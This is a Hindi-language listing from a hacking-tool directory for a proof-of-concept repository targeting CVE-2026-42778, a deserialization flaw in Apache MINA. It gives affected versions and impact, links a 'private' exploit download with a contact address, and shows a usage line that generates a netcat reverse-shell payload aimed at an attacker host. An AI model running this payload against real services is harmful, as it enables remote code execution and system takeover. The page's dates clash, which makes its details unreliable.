Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-42778-POC — CVE-2026-42778 EUVD-2026-26492 अविश्वसनीय डेटा का डिसीरियलाइज़ेशन (CWE-502) | Kitploit
उपकरण/GitHubGitHub/akinfue/cve-2026-42778-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेलोड डेवलपमेंटबाइनरी शोषण
GitHubakinfue/cve-2026-42778-poc

CVE-2026-42778-POC

CVE-2026-42778 EUVD-2026-26492 अविश्वसनीय डेटा का डिसीरियलाइज़ेशन (CWE-502)

रिपॉजिटरी देखें
14 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-42778

अवलोकन

Apache MINA के AbstractIoBuffer.getObject() विधि में अधूरा सुधार। क्लासनेम अनुमतिसूची सत्यापन जो यह प्रतिबंधित करता है कि कौन सी क्लासें डिसीरियलाइज़ की जा सकती हैं, बहुत देर से लागू किया जाता है, पढ़ी जा रही क्लासों में स्टैटिक इनिशियलाइज़र पहले ही निष्पादित हो चुके होते हैं। ऐसा इसलिए होता है क्योंकि CVE-2024-52046 के लिए मूल सुधार 2.1.X और 2.2.X शाखाओं पर ठीक से लागू नहीं किया गया था। प्रभावित संस्करण: - Apache MINA 2.1.0 से 2.1.11 - Apache MINA 2.2.0 से 2.2.6

एक्सप्लॉइट:

यहाँ डाउनलोड करें

विवरण

  • CVE ID: CVE-2026-42778

  • प्रकाशित: 05/01/2026

  • प्रभाव: गंभीर

  • एक्सप्लॉइट उपलब्धता: सार्वजनिक नहीं, केवल निजी।

  • CVSS: 9.8

  • पैच उपलब्ध: (अभी तक कोई आधिकारिक पैच नहीं)

प्रभाव

एक हमलावर दुर्भावनापूर्ण सीरियलाइज़्ड ऑब्जेक्ट बना सकता है, जिन्हें IoBuffer.getObject() द्वारा संसाधित करने पर, क्लासनेम अनुमतिसूची सत्यापन होने से पहले स्टैटिक इनिशियलाइज़र के माध्यम से मनमाना कोड निष्पादित होता है। चूँकि यह एक नेटवर्क-सुलभ भेद्यता है जिसके लिए किसी विशेषाधिकार या उपयोगकर्ता इंटरैक्शन की आवश्यकता नहीं होती, Apache MINA का उपयोग करने वाले किसी भी एप्लिकेशन के लिए जो IoBuffer.getObject() विधि को कॉल करता है, रिमोट कोड निष्पादन संभव है। यह भेद्यता प्रभावित सिस्टम की गोपनीयता, अखंडता और उपलब्धता से पूर्ण समझौता करने की अनुमति देती है।

प्रभावित संस्करण

  • Apache MINA 2.1.0 से 2.1.11
  • Apache MINA 2.2.0 से 2.2.6

उपयोग

root@kitploit:~
# कंपाइल और जनरेट करें
javac ExploitGenerator.java
java ExploitGenerator "nc -e /bin/sh attacker-ip 4444"

# ObjectSerializationCodecFactory का उपयोग करके MINA-आधारित सेवा पर नेटवर्क के माध्यम से भेजें
# या किसी भी एंडपॉइंट पर जो IoBuffer.getObject() को कॉल करता है

संपर्क

  • पूछताछ के लिए, कृपया संपर्क करें:[email protected]
  • एक्सप्लॉइट : यहाँ
टूल डाउनलोड करें